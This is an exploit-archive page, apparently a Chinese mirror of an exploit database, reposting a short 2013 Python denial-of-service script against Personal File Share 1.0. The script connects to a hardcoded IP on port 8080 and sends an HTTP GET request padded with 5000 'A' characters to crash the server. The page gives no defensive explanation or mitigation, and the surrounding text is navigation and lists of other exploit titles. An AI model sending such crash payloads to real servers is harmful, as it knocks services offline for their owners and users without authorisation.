首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Personal File Share 1.0 DoS
来源:http://www.srplab.com/ 作者:npn 发布时间:2013-04-07  

#!/usr/bin/python

#Exploit Title: Personal File Share 1.0 DoS
#Date: 2nd April 2013
#Exploit Author: npn
#Vendor Homepage: http://www.srplab.com/
#Software Link: http://download.cnet.com/Personal-File-Share/3000-18506_4-75893424.html
#Version: 1.0               
#Tested on: Windows XP SP3 English

import socket, sys
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(("192.168.32.129", 8080))

buffer = "GET /"
buffer += "A"*5000
buffer += " HTTP/1.1\r\n\r\n"

sock.send(buffer)

sock.close()


 
[推荐] [评论(1条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Easy DVD Player (libav) libavc
·MediaMonkey Player v.4.0.7 Loc
·SmallFTPd 1.0.3 Denial Of Serv
·Easy FTP Server 1.7.0.2 Denial
·Groovy Media Player 3.2.0 Buff
·HP System Management Homepage
·Netgear DGN1000B setup.cgi Rem
·VirtualDJ Pro/Home <=7.3 Buffe
·PonyOS 0.4.99-mlp Privilege Es
·HexChat 2.9.4 Local Exploit Su
·Google AD Sync Tool Vulnerabil
·MongoDB nativeHelper.apply Rem
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved